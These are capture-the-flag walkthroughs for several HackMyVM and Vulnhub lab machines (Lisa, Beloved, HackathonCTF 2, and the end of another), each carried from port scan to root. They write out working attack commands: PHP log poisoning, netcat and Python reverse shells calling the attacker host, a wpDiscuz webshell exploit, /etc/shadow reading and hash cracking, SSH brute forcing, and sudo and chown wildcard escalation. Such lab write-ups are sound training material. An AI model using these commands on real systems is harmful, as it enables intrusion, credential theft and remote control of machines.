We put shell code in command.jpg, then upload through ftp.

[image-20210707135227171.png]

Wait a minute, we will get reverse shell.

 ~ nc -nlvp 1234                                                                                                                                                                                 fish-0 | 0 [13:09:25]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:49930.
 bash: cannot set terminal process group (136083): Inappropriate ioctl for device
 bash: no job control in this shell
 sophie@nowords:~$

The root step is use the Ubuntu Polkit Vulnerability.

Check the POC here.

https://github.com/Almorabea/Polkit-exploit

[image-20210707134038343.png]

HackMyVm Lisa Walkthrough

HackMyVm Lisa Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Lisa

Scan ports.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 17:f7:58:02:e9:00:69:04:c5:88:ba:65:5a:11:dc:58 (RSA)
 |   256 4c:32:c5:92:8c:d9:06:a4:a9:89:fa:99:92:bb:66:7f (ECDSA)
 |_  256 d1:36:d3:da:2b:7f:d7:03:5f:fc:1b:94:aa:7e:04:af (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80, found nothing useful. Check index.html, notice the hint about domain name vinci.hmv.

 ~ curl http://192.168.56.100/index.html |tail -n 15                                  
           <p>
                 Please report bugs specific to modules (such as PHP and others)
                 to respective packages, not to the web server itself. contact: vinci.hmv
           </p>
         </div>

Add vinci.hmv to /etc/hosts, scan port 80 again, still found nothing useful.

Use gobuster to enum vhosts.

 ~ gobuster vhost -u vinci.hmv  -w  /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -v |grep -v 10719
 ===============================================================
 ...
 Missed: secret.vinci.hmv (Status: 200) [Size: 80]
 ===============================================================
 2021/07/04 15:35:24 Finished
 ===============================================================

Add secret.vinci.hmv to /etc/hosts, scan files again, found file.php.

 ~ gobuster dir -u http://secret.vinci.hmv -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medi
 um.txt  -x .html,.php,.txt,.zip,.bak,.php.bak -b 401,403,404,500 --wildcard   -o 80_secret.log
 ===============================================================
 /index.html           (Status: 200) [Size: 80]
 /file.php             (Status: 200) [Size: 0]

Wfuzz to get the param name.

 ~ wfuzz -u 'http://secret.vinci.hmv/file.php?FUZZ=/etc/passwd' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000004959:   200        26 L     42 W       1441 Ch     "command"  

Looks like a LFI.

 ~ curl 'http://secret.vinci.hmv/file.php?command=/etc/passwd'                        fish-0 | 0 [15:55:59]
 root:x:0:0:root:/root:/bin/bash
 ...
 leonardo:x:1000:1000:leonardo,,,:/home/leonardo:/bin/bash
 ...

See what files we can read.

~ wfuzz -u 'http://secret.vinci.hmv/file.php?command=FUZZ' -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --hh 0        
 ********************************************************
 * Wfuzz 3.1.0 - The Web Fuzzer                         *
 ********************************************************      
 ...
 000000188:   200        0 L      1 W        32032 Ch    "/var/log/faillog"
 000000173:   200        1364 L   16410 W    130186 Ch   "/var/log/auth.log"
 000000181:   200        2993 L   17879 W    202004 Ch   "/var/log/dpkg.log"
 000000220:   200        5 L      85 W       74873 Ch    "/var/log/wtmp"
 000000224:   200        0 L      1 W        1152 Ch     "/var/run/utmp"
 000000199:   200        0 L      1 W        292292 Ch   "/var/log/lastlog"

Because auth.log will save the username of ssh login. So we use a shell code as the ssh name.

 ~ ssh '<?php system($_GET[c]);?>'@192.168.56.100    
 <?php system($_GET[c]);?>@192.168.56.100's password:
 Permission denied, please try again.                

Now we can run bash command.

 ~ curl 'http://secret.vinci.hmv/file.php?command=/var/log/auth.log&c=id'
 ...
 Jun 20 21:55:28 Lisa sshd[7932]: Failed password for invalid user uid=33(www-data) gid=33(www-data) groups
 =33(www-data)
  from 192.168.56.150 port 33632 ssh2
 ...

Get reverse shell.

 ~ curl 'http://secret.vinci.hmv/file.php?command=/var/log/auth.log&c=nc%20192.168.56.150%201234%20-e%20/bi
 n/bash'
 =====================================================================
 ~ nc -nlvp 1234                                        
 Ncat: Version 7.91 ( https://nmap.org/ncat )          
 Ncat: Listening on :::1234                            
 Ncat: Listening on 0.0.0.0:1234                        
 Ncat: Connection from 192.168.56.100.                  
 Ncat: Connection from 192.168.56.100:52344.            
 id                                                    
 uid=33(www-data) gid=33(www-data) groups=33(www-data)  

There is only one user leonardo, and /opt/cron.sh belongs to him.

```
www-data@Lisa:/home/leonardo$ find / -user leonardo 2>/dev/null
find / -user leonardo 2>/dev/null
/home/leonardo
/home/leonardo/.bash_logout
/home/leonardo/.profile
/home/leonardo/.bashrc
/home/leonardo/.local
/home/leonardo/.local/share
/home/leonardo/.selected_editor
/home/leonardo/user.txt
/opt/cron.sh


Check the source code of cron.sh. 

www-data@Lisa:/opt$ cat cron.sh
cat cron.sh

!/bin/bash

domain='shelly.lisa.hmv'

function check(){

     timeout 1 bash -c "ping -c 1 $domain" > /dev/null 2>&1
 if [ "$(echo $?)" == "0" ]; then
     nohup nc -e /bin/sh $domain 65000
     exit 0
 elseifconfig
     exit 1
 fi                                                        

}


Add the ip of attacker's machine to /etc/hosts.

www-data@Lisa:/opt$ ls -la /etc/hosts
ls -la /etc/hosts
-rw----rw- 1 root root 457 Jun 14 17:55 /etc/hosts
www-data@Lisa:/opt$ echo '192.168.56.150 shelly.lisa.hmv' > /etc/hosts


Wait a minute, we get reverse shell of user leonardo.

 ```
~ nc -nlvp 65000                                                                   curl-0 | 130 [16:15:34]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::65000
 Ncat: Listening on 0.0.0.0:65000
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:49036.
 id
 uid=1000(leonardo) gid=1000(leonardo) grupos=1000(leonardo),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Upload id_rsa.pub to /home/leonardo/.ssh/authorized_keys and chmod 600. Then we get ssh access.

 ~ ssh leonardo@192.168.56.100                                                      fish-0 | 130 [16:20:35]
 Enter passphrase for key '/home/kali/.ssh/id_rsa':
 Linux Lisa 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Mon Jun 14 13:01:44 2021 from 192.168.1.83
 /usr/bin/xauth:  file /home/leonardo/.Xauthority does not exist
 leonardo@Lisa:~$

Check sudo -l.

leonardo@Lisa:~$ sudo -l
 sudo: unable to resolve host Lisa: Fallo temporal en la resolución del nombre
 Matching Defaults entries for leonardo on Lisa:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User leonardo may run the following commands on Lisa:
     (root) NOPASSWD: /usr/bin/efax

Use efax to read shadow file.

```
leonardo@Lisa:~$ sudo efax -d /etc/shadow
sudo: unable to resolve host Lisa: Fallo temporal en la resolución del nombre
efax: Sun Jun 20 23:10:17 2021 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: Sun Jun 20 23:10:17 2021 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: 10:17 compiled Dec 15 2016 12:12:26
efax: 10:17 opened /etc/shadow
efax: 10:17 Error: tcgetattr on fd=3 failed: Función ioctl no apropiada para el dispositivo
efax: 10:17 Warning: unexpected response "root:$6$RnHOYwKvoinsNFhF$zdIHAyW0TtHpAfnUc2p2bEPaHTuu/vdRFcTOSzOokSflUo/YoqDU3NzSCtm9VRELG53fGVrfen1PNBKGt6gix0:18792:0:99999:7:::"
efax: 10:17 Warning: unexpected response "daemon::18791:0:99999:7:::"
efax: 10:17 Warning: unexpected response "bin:
:18791:0:99999:7:::"
...


Use john to crack the password hash of root.

~ john --wordlist=/usr/share/wordlists/rock_ascii.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveme (root)
1g 0:00:00:00 DONE (2021-07-05 10:28) 6.666g/s 1706p/s 1706c/s 1706C/s 123456..freedom
Use the "--show" option to display all of the cracked passwords reliably
Session completed


Get root at last.

leonardo@Lisa:~$ su root
Contraseña:
root@Lisa:~# id;hostname
uid=0(root) gid=0(root) grupos=0(root)
Lisa

HackMyVm Beloved Walkthrough(chown wildcard injection)

HackMyVm Beloved Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Beloved

Scan for open ports.

 ~ nmap -sV -sC -p- -oN ports.log 192.168.56.100
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
 |   256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
 |_  256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-generator: WordPress 5.7.2
 | http-robots.txt: 1 disallowed entry
 |_/wp-admin/
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Beloved – Just another WordPress site
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 is wordpress. Add beloved to /etc/hosts. Search for vulnerabilities.

 ~ wpscan --url http://beloved -e ap --no-banner --api-token yourkey --force --plugins-detection aggressive |tee wpscan.log
 [+] wpdiscuz
  | Location: http://beloved/wp-content/plugins/wpdiscuz/
  | Last Updated: 2021-05-15T13:40:00.000Z
  | Readme: http://beloved/wp-content/plugins/wpdiscuz/readme.txt
  | [!] The version is out of date, the latest version is 7.2.2
  |
  | Found By: Known Locations (Aggressive Detection)
  |  - http://beloved/wp-content/plugins/wpdiscuz/, status: 200
  |
  | [!] 1 vulnerability identified:
  |
  | [!] Title: Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload
  |     Fixed in: 7.0.5
  |     References:
  |      - https://wpscan.com/vulnerability/92ae2765-dac8-49dc-a361-99c799573e61
  |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24186
  |      - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
  |      - https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz
  |
  | Version: 7.0.4 (80% confidence)

Search exp for wpdiscuz.

~ searchsploit wpdiscuz                                                              fish-0 | 0 [21:19:28]
 ------------------------------------------------------------------------ ---------------------------------
  Exploit Title                                                          |  Path
 ------------------------------------------------------------------------ ---------------------------------
 WordPress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticate | php/webapps/49962.sh
 WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticate | php/webapps/49967.py
 WordPress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary File Upload | php/webapps/49401.rb
 ------------------------------------------------------------------------ --------------------------------

Run the POC code.

```
~ python3 49967.py -u http://beloved -p /2021/06/09/hello-world/ bash-0 | 0 [12:17:55]

[-] WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution
[-] File Upload Bypass Vulnerability - PHP Webshell Upload
[-] CVE: CVE-2020-24186
[-] https://github.com/hevox

[+] Response length:[51680] | code:[200]
[!] Got wmuSecurity value: 9c794f21e7
[!] Got wmuSecurity value: 1

[+] Generating random name for Webshell...
[!] Generated webshell name: bhgnpbentfvkgzh

[!] Trying to Upload Webshell..
[+] Upload Success... Webshell path:url":"http://beloved/wp-content/uploads/2021/07/bhgnpbentfvkgzh-1625199034.4666.php";


Visit the webshell, listen to port 1234, we can get a reverseshell.

http://beloved/wp-content/uploads/2021/07/bhgnpbentfvkgzh-1625199034.4666.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27


Check sudo -l.

 ```
www-data@beloved:/home$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on beloved:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on beloved:
     (beloved) NOPASSWD: /usr/local/bin/nokogiri

The nokogiri will activate an ruby shell, but the trick is to add an extra parameter for log file.

www-data@beloved:/$ touch /tmp/log.txt                    
 touch /tmp/log.txt
 www-data@beloved:/$ sudo -u beloved /usr/local/bin/nokogiri /tmp/log.txt
 sudo -u beloved /usr/local/bin/nokogiri /tmp/log.txt
 Your document is stored in @doc...
 Switch to inspect mode.
 system 'id'
 system 'id'
 uid=1000(beloved) gid=1000(beloved) groups=1000(beloved)
 system '/bin/bash'

Now we are beloved. We upload id_rsa.pub, change to authorzied_keys, to get ssh access.

```
cd .ssh
wget http://192.168.56.150/id_rsa.pub -O authorized_keys
--2021-07-02 06:44:36-- http://192.168.56.150/id_rsa.pub
Connecting to 192.168.56.150:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 565 [application/x-mspublisher]
Saving to: ‘authorized_keys’
...
chmod 600 authorized_keys


Ssh login as beloved.

~ ssh beloved@192.168.56.100
...
beloved@beloved:~$ id
uid=1000(beloved) gid=1000(beloved) groups=1000(beloved)


Check pspy64.

2021/07/02 06:47:01 CMD: UID=0 PID=1878 | /usr/sbin/CRON -f
2021/07/02 06:47:01 CMD: UID=0 PID=1879 | /bin/sh -c cd /opt && chown root:root *


In /opt, there is only a id_rsa. Maybe it's private key for user root. We need to make it readable for user beloved.

 ```
beloved@beloved:/$ ls -la opt
 total 12
 drwxrwx---  2 root    beloved 4096 Jul  2 06:52 .
 drwxr-xr-x 18 root    root    4096 May 19 10:09 ..
 -rw-------  1 root    root    1823 Jun 27 16:41 id_rsa

Use the chown wildcard vulnerability. See the article here.

beloved@beloved:/opt$ touch ref
 beloved@beloved:/opt$ touch -- --reference=ref

Wait a minute, the id_rsa has been changed to user beloved, which is the owner of file ref.

```
beloved@beloved:/opt$ ls -la
total 12
drwxrwx--- 2 root beloved 4096 Jul 2 06:59 .
drwxr-xr-x 18 root root 4096 May 19 10:09 ..
-rw------- 1 beloved beloved 1823 Jun 27 16:41 id_rsa
-rw-r--r-- 1 beloved beloved 0 Jul 2 06:58 ref
-rw-r--r-- 1 beloved beloved 0 Jul 2 06:59 '--reference=ref'


Read id_rsa, then we can login ssh as root.

~ ssh root@192.168.56.100 -i key ...
root@beloved:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
beloved

Vulnhub HackathonCTF: 2 Walkthrough

Vulnhub HackathonCTF: 2 Walkthrough

https://www.vulnhub.com/entry/hackathonctf-2,714/

Difficulty: Easy

Scan ports.

 ~ nmap -sV -sC -p- 192.168.33.140  -oN ports.log            
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-27 17:17 CST
 Nmap scan report for bogon (192.168.33.140)              
 PORT     STATE SERVICE VERSION
 21/tcp   open  ftp     vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | -rw-r--r--    1 1000     1000           47 Jun 18 17:32 flag1.txt
 |_-rw-r--r--    1 1000     1000          849 Jun 19 05:11 word.dir
 ...
 80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
 | http-robots.txt: 1 disallowed entry                                                 ...
 7223/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
 ...

Get a dic file from ftp.

 ~ ftp 192.168.33.140                                            
 Connected to 192.168.33.140.                                    
 220 (vsFTPd 3.0.3)                                              
 Name (192.168.33.140:kali): anonymous                            
 331 Please specify the password.                                
 Password:                                                        
 230 Login successful.                                            
 Remote system type is UNIX.                                      
 Using binary mode to transfer files.                            
 ftp> ls -la                                                      
 200 PORT command successful. Consider using PASV.                
 150 Here comes the directory listing.                            
 drwxr-xr-x    2 0        118          4096 Jun 19 05:11 .        
 drwxr-xr-x    2 0        118          4096 Jun 19 05:11 ..      
 -rw-r--r--    1 1000     1000           47 Jun 18 17:32 flag1.txt
 -rw-r--r--    1 1000     1000          849 Jun 19 05:11 word.dir
 226 Directory send OK.                                          
 ftp> get word.dir                                                
 local: word.dir remote: word.dir            

Scan folders and files of port 80.

~ gobuster dir -u http://192.168.33.140 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /index.html           (Status: 200) [Size: 1254]
 /robots.txt           (Status: 200) [Size: 70]
 /happy                (Status: 200) [Size: 110]          

Visit /happy, check source code, found username hackathonll.

```
~ curl http://192.168.33.140/happy
<html>
<title>happy</title>

<body><h1> Nothing is in here</h1></body>

<!-- username: hackathonll >

</html>


Brute force ssh with this username and the dic file.

~ hydra -l hackathonll -P word.dir 192.168.33.140 -s 7223 ssh -t64 -f
...
[DATA] attacking ssh://192.168.33.140:7223/
[7223][ssh] host: 192.168.33.140 login: hackathonll password: Ti@gO
[STATUS] attack finished for 192.168.33.140 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

Ssh login, check sudo -l.

 ```
~ ssh hackathonll@192.168.33.140 -p 7223
 ...
 $ sudo -l
 Matching Defaults entries for hackathonll on hackathon:
     env_reset, mail_badpass,
 secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 User hackathonll may run the following commands on hackathon:
     (root) NOPASSWD: /usr/bin/vim

Sudo run vim, press ":", then input "!/bin/bash", and became root.

$ sudo vim                            

 root@hackathon:/home/hackathonll# id  
 uid=0(root) gid=0(root) groups=0(root)